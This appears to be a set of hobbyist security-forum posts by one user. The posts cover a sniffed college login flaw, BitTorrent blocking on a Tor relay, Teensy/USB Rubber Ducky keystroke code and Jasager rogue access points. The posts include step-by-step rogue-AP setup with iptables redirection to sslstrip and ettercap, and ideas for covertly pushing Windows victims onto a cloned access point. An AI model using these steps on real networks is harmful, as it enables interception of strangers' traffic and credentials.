Mr-Protocol

I work at a community college and attend classes as well. I was in my networking forensics course and happen to notice the website we use for class interaction was not HTTPS. Well needless to say accounts and passwords (typically last 4 of social security number from default user account creation) were flying past my screen. I was sniffing wireless and had lots of logins from the library wireless computers. After telling my supervisor and him talking to another supervisor, it got fixed. But of course it did not get fixed until 5 weeks later and the "networking team" took credit for it. Given everyone knows I discovered it. It was probably setup like that for YEARS but nobody noticed it as a security risk.

You may say: "OMGz y block torrentz¿" Here is my situation: I am running a tor relay on Ubuntu VM (VirtualBox) and noticed a LOT of traffic of the BitTorrent nature. The point of running tor is not to hide yourself from your ISP so you can download pirated movies/music/software/etc. So I went off looking for a solution to identifying and blocking BitTorrent activity through my tor relay. A few people suggested ipp2p, ROPE, IPCop, or many other addons. Another suggestion was buying some high end corporate router to detect and block. I did some reading from SANS and what their methods were on detecting BitTorrents from a forensic standpoint. The material I read was good but a little out-dated. That and it was how to detect it with snort. Well I didn't want to have to setup snort just to block BitTorrents. Seems like there should be an easier way. AND there is :D! iptables Yup plain ol iptables. My blocking methods: Google Doc Link To My Script. With that script posted above, I have only seen BitTorrent handshake packets come in. Which is normal but they are dropped as soon as they hit my machine. It has eased the bandwidth of my network and the tor relay isn't being abused by a bunch of BitTorrent connections. I'm not sure how many others would benefit from this script/commands so i figured I would share. If nothing else when you MITM you can cut back the number of packets you are looking at by eliminating BitTorrent traffic. Supposedly ~65% of internet traffic is BitTorrent related. Possibly can add this as an option in Jasager or Interceptor so they don't get bogged down either? I'm no master of iptables so if you have any comments on what I have here, feel free to post your thoughts.

Hulk has some Human Resources history. Something about anger management?

If I had no idea what you were talking about.. I'd question if that was a racist remark lol.

I was reading the snort manual and it talked about the ability to replace matched content in packets before they are sent on the network. Example: alert tcp any any <> any 80 (msg: "tcp replace"; content:"GET"; replace:"BET";) Windows equivalent of it would be I think WPE Pro with it's packet filters. I used to use those to cheat on some online games by modifying "spellcast_lvl1" with the code for "spellcast_lvl100" sort of thing. I was wondering what (assuming it there is something out there I haven't heard of) that does this without a full blown install and config of snort. Edit: ettercap filters I can use ettercap filters to do such things. But now my question is how to I get it to work properly. My Goal: Run a tor exit node (relay node), run an ettercap filter to modify the bittorrent traffic signatures coming through my tor exit node to drop the packets. I want to keep those bittorrent users off my node.

Pretty sure you could also define the paths in the command string as well.

My understanding is, buying the pineapple II is for people whom: 1) Want to support Hak5 shop. GREAT! 2) Do not have the technical experience or desire to build one themselves. Practically you will need to reconfigure the whole thing. So all the hard work that Darren or whomever did, is gone sadly. Start looking around the forums on how to configure it. You will need to get Putty and SSH into it and start playing around with the configs. Or you can use the webif (if you can get to it) and you can edit the files through that. I'm at work so I can't elaborate on what exactly to change but it's in the forums here all over. Good luck.

These are my steps I created with a vast amount of jumping through this forum. This is my setup: Jasager is connected to my BT4 laptop ethernet port via crossover cable. BT4 laptop wireless is connected to a legitimate wireless access point using wlan0. 1) Jailbreak Fon (Hak5 Forums) then Using Jasager Firmware 2.1 from digininja using FonFlash.exe or ap51-flash-fonera-gui1.0-42.exe 2) Telnet the fon (192.168.1.1) and 'passwd root' then 'reboot' 3) Use winscp424 and transfer over haserl_0.9.24-1_mips.ipk and webif_0.3-4709_mips.ipk to the /tmp directory on the fon 4) SSH (putty) into the fon and cd /tmp then run 'opkg install haserl...' when completed run 'opkg install webif...' then 'reboot' 5) Edit /etc/config/dhcp list 'dhcp_option' '3,192.168.169.16' **Sets Gateway to Laptop LAN card list 'dhcp_option' '6,8.8.8.8' **Sets DNS to GoogleDNS 6) Edit /karma/www/cgi-bin/functions.rb under "def create_interface()" add the following: system("sleep 1") system("brctl addif br-lan ath0 2>&1 > /dev/null") 7) Login webif, Network tab, DHCP subtab, Disable Bogus Private Reverse Lookups, Disable filterwin2k, Disable Localise Queries ---Save settings and apply 8) Login Webif, Network Tab, Networks subtab, Set IP address 192.168.169.169 with netmask 255.255.255.0 ---Save settings and apply Optional: edit /etc/banner Those steps might not have the most up to date files. But that is the process of getting it installed and working for me on my Fon2100. Then on BackTrack4: Boot BackTrack4 on laptop. connect to wireless access point using network manager. (start-network) then ifconfig eth0 192.168.169.16 check ifconfig make sure both interfaces have IP addresses echo 1 > /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE login to Jasager interface http://192.168.169.169:1471 turn on ath0 button add your ssid your laptop is getting internet from to the blacklist enable karma I use this setup with SSL Strip: sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 optional: ettercap -u -T -q -i eth0 sslstrip -a -l 64123 -w /root/sslstriplog.txt -f /usr/share/sslstrip/lock.ico Hope this helps.

I actually found this old duck PEZ dispenser which got me to thinking. the teensy BARELY fits in the candy area...

Keyboard.set_key1(ctrlkey); It doesn't like that line i'm assuming. You are sending it a char value when it wants one of it's defined key codes KEY_A not "KEY_A" KEY_A is like a defined constant. So it doesn't need quotes. you may have to change the input type of your function as well so it's not expecting a CHAR array and you giving it something different. Try: void setup(){ delay(3000); ctrlcombo(KEY_A); } void ctrlcombo(uint8_t ctrlkey){ Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(ctrlkey); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } Or read up a lil at http://www.pjrc.com/teensy/td_keyboard.html I can't test because I'm at work. Speaking of which I got a meeting in 5 min.

I had an idea to use the Ducky when plugged into a Windows 7 machine to create an open wireless connection "linksys" that would always try to connect automatically. Of course, if you are physically plugging in a Ducky into someone's laptop, you are within range of them so why not have a pineapple close by to accept the initial "linksys" SSID as noted above? My typical Pineapple/Jasager is setup as such: Jasager connects to my BackTrack4 laptop with forwarding/ICS. BT4 laptop connects via Wireless to a legit Access Point with internet access. Clients connect to Jasager. Example: Myself and my co-worker went to a cafe and it had an open linksys router. When I used kicked all clients from it in an attempt to have my pineapple intercept all traffic. My co-worker's laptop connected back to the original AP and noted the pineapple as "linksys 2". My goal is to find a command line way to have the USB Rubber Ducky change wireless config of Win7 to allow the jasager to function as it does with XP. Win7 I think does something different as stated above in my scenario I tried. So I'm trying to ask the community for some methodology on how to accomplish this. I've looked into netsh wlan, but I think you need an Administrator cmd. If I'm wrong about how Win7 works with wireless please enlighten me for I do not have a Win7 laptop. But for whatever reason my co-worker's laptop refused to connect to Jasager when all other clients (XP, blackberry devices) did.

There really cannot be a standard even with the simplest code. Delays need to be changed depending on the system it's being plugged into. If someone is savy enough to code the Ducky. They should have no issues adding delays or making functions work on their Ducky from someone's code. And as most open source, there is no standard really. So people have the flexibility to do what they want with it. Break out of standardized environments... like Windows :-s. sorry for the mini-rant lol.

Possibly using a registry settings would be an easier solution. Even if the ducky has to quickly write a .reg file and merge.

Only one way to find out... lol. That and this little processor is looping a small bit of code really really fast. With no delays in that small mouse move code, i doubt they could fight it. The only thing they could do is use the keyboard to navigate. So add a click in there and they cant navigate at all practically. To make Vista/7 users really angry, move mouse to bottom right corner of the screen to hide/ghost all windows, or click to minimize all :P

This is what I got done after about an hour of playing. I'm using the Arduino to code it and as a note, you want to put some sort of delay before it starts mashing keys. I figure a 10 second initialization for a "virgin" PC is enough time so I coded a 10 second delay with blink response. Then after that it very quickly opens ipconfig, netstat, tasklist, systeminfo, and a cmd shell with a unique title. Could be used for a quick stats from a forensic standpoint if you need volatile information such as connection states or tasklist. I have made scripts to do so remotely for my forensic class running from a remote PC so that's why I was just messing around and made this. /*Programmed By: Mr-Protocol 4-29-2010 Blinks 10 Times (10 second timer) LED On while working Opens ipconfig, netstat, tasklist, systeminfo, cmd (with a title change) LED Off when done Does NOT loop continuously */ int ledPin = 11; //LED is on pin 11 int isDone = 0; int startdelay = 0; void setup() { pinMode(ledPin, OUTPUT); //Does 10 Sec delay with 10 blinks of LED do { digitalWrite(ledPin,HIGH); delay(500); digitalWrite(ledPin,LOW); delay(500); startdelay++; } while (startdelay < 10); } void loop() { if(isDone < 1) { CmdCommand("ipconfig"); delay(250); CmdCommand("netstat"); delay(250); CmdCommand("tasklist"); delay(250); CmdCommand("systeminfo"); delay(250); CmdCommand("title I @m h4x0r"); delay(250); Keyboard.print("cls"); PressAndRelease(KEY_ENTER,1); isDone=1; pinMode(ledPin,LOW); } } void CmdCommand(char *Cmd_Command) { CommandAtRunBar("cmd.exe"); delay(100); Keyboard.print(Cmd_Command); PressAndRelease(KEY_ENTER,1); } void CommandAtRunBar(char *SomeCommand) { digitalWrite(ledPin, HIGH); Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); delay(10); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(10); Keyboard.print(SomeCommand); PressAndRelease(KEY_ENTER,1); } void PressAndRelease(int KeyCode,int KeyCount) { int KeyCounter=0; for (KeyCounter=0; KeyCounter!=KeyCount; KeyCounter++) { Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } } CommandAtRunBar & PressAndRelease from Irongeek's Code. Why Reinvent the wheel? (Added a delay and lowered initial delay) Thanks for the Ducky Dev Kit (DDK?) Darren.

Yeah that sounds like a better solution, I own both a fon and a ruler :P but right now i'm at work and with antartica going on outside not sure when i will be able to get home to do it.

I'm also curious about this question so I can do the same thing as OP

the Meraki is supported by openwrt Model Platform & Frequency Flash RAM Wireless NIC Meraki Mini Atheros AR2315 @ 180MHz 8MB 32MB AR2315 integrated No support for the wireless N yet by openWRT

Not sure if this has the right chipset. Or if we can even install dd-wrt/openwrt on it. But it is a mini wireless N Router http://www.trendnet.com/products/proddetai...54TR&cat=66 Dimensions (LxWxH) 60 x 80 x 18.5mm (2.4 x 3.2 x 0.7in) Output Power 802.11b: 14±2dBm (typical) 802.11g: 14±2dBm (typical) 802.11n :12±2dBm (typical) Here is another b/g wireless mesh router http://meraki.com/products_services/access_points/indoor/

Does Piranha 3.0 have jasager in it? I don't see it in the packages...?

I wasn't successful with using piranha. i just got digininja's firmware working and i got it all up and running and just want to add macchanger. Any direction for me to start?

It is possible to compile macchanger on the jasager to in theory emulate access points mac address so OS's like Vista/7 will not put a number after the SSID if it sees multiple. For example. If i connected to a network called "MyNet" and someone threw up a Jasager, it would show as "MyNet 2" in Win7. I think with Macchanger to copy the real AP mac should be able to trick the OS. That and not sure how that would work with intercepting traffic (double traffic?) if both the real AP and Jasager accept the traffic and try to send it to the internet cloud to process say a page request. It would be like a true clone of the AP.

IP: 193.169.13.200 IP Country: ip address flag Ukraine

Couldn't ping. Got this: ping extrassecurityzone.com Ping request could not find host extrassecurityzone.com. Please check the name a nd try again.

Yeah i'm done playing with it... could care less but just wanted to notify people